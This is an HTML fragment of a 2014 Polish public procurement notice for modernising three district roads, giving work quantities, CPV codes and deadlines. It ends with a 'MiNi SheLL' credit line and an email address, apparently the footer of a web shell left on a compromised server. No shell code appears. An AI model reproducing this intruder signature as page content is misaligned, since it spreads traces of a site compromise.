<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Modernizacja drogi powiatowej Nr 1354W (Paprotnia) - gr. woj. - Mościska - Wola Życka - Kozice - Trojanów w km 10+067 ÷ 11+831..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie modernizacji drogi powiatowej Nr 1354W (Paprotnia) - gr. woj. - Mościska - Wola Życka - Kozice - Trojanów w km 10+067 ÷ 11+831.

Przebudowa drogi obejmuje:
NAWIERZCHNIA  
Mechaniczne oczyszczenie nawierzchni ulepszonej - bitum. w ilości 9702 m2
Skropienie nawierzchni drogowych emulsja asfaltową w ilości 6033,5 m2
Wyrównanie istniejącej nawierzchni betonem asfaltowym wg PN-EN, KR-2, wbudowanym mechanicznie w ilości 452,51Mg
Warstwa ścieralna nawierzchni wykonana z betonu asfaltowego wg PN-EN, KR-2, gr. w-wy po zagęszczeniu 3 cm w ilości 6033,5 m2
Powierzchniowe utrwalenie nawierzchni drogowych emulsją asfaltową przy użyciu grysu kamiennego frakcji 5-8, ilość kruszywa 8,0dm3/m2	 w ilości 3668,5 m2
POBOCZA  
Mechaniczne ścinanie poboczy o gr. 5 cm z załadunkiem i wywiezieniem na odl. do 1 km w ilości 3508 m2
Pobocza z kruszyw łamanych przy grubości warstwy po zagęszczeniu 10 cm w ilości 3508 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przebudowa drogi powiatowej Nr 1337W Miastków Kościelny - Ryczyska - Gózdek w km 6+927 ÷ 7+127.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie przebudowy drogi powiatowej Nr 1337W Miastków Kościelny - Ryczyska - Gózdek w km 6+927 ÷ 7+127

Przebudowa drogi obejmuje:
ODWODNIENIE
Oczyszczenie rowów z namułu z wyprofilowaniem skarp rowu, grubość namułu 30 cm	w ilości	400 m
Załadunek i wywóz gruntu kat. III z renowacji rowu na odkład na odl. do 1 km	w ilości 48 m3
NAWIERZCHNIA
Oczyszczenie nawierzchni ulepszonej bitumicznej  mechanicznie w ilości 1000m2
Skropienie warstw konstrukcyjnych emulsją asfaltową  w ilości 1000 m2
Wyrównanie istniejącej nawierzchni betonem asfaltowym wg PN-EN, KR-2 w ilości 50 Mg	
Warstwa ścieralna nawierzchni wykonana z betonu asfaltowego wg PN-EN, gr. w-wy 3 cm, KR-2 z uszczelnieniem złączy poprzecznych i podłużnych taśmą asfaltową w ilości 1000 m2

POBOCZA
Uzupełnienie poboczy gruntem kat. III z dokopu z odl. do 1 km w ilości 15 m3
Transport gruntu na pobocza - za dalsze 4 km w ilości 15 m3
Mechaniczne profilowanie poboczy w ilości 300 m2
Mechaniczne zagęszczenie poboczy w ilości 300 m2
ZJAZDY GOSPODARCZE
Przepusty rurowe pod zjazdami - rury PEHD o średnicy 30 cm w ilości 36 m
Warstwa odsączająca, zagęszczanie mechaniczne, gr. w-wy po zagęszczeniu 20 cm w ilości 140,4 m2
Podbudowy z kruszyw łamanych przy grubości warstwy po zagęszczeniu 15 cm w ilości 140,4 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przebudowa drogi powiatowej Nr 1343W Gończyce - Chotynia - Wólka Ostrożeńska - Piastów w km 1+846 ÷ 2+536.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie przebudowy drogi powiatowej Nr 1343W Gończyce - Chotynia - Wólka Ostrożeńska - Piastów w km 1+846 ÷ 2+536

Przebudowa drogi obejmuje:
NAWIERZCHNIA
Mechaniczne czyszczenie nawierzchni ulepszonej - bitum. w ilości 3450 m2
Wyrównanie istniejącej nawierzchni betonem asfaltowym wg PN-EN, KR-2 wbudowanym mechanicznie w ilości 258,75 Mg
Powierzchniowe utrwalenie nawierzchni drogowych emulsja asfaltową C69 B3 PU ( K1-70 ) i grysem kamiennym frakcji 2-5 w ilości 3450 m2

POBOCZA
Naprawy poboczy wykonywane mechanicznie - ścinanie o grubości 5 cm z zał. i wywiezieniem urobku na odkład na odl. do 1 km w ilości 1380 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com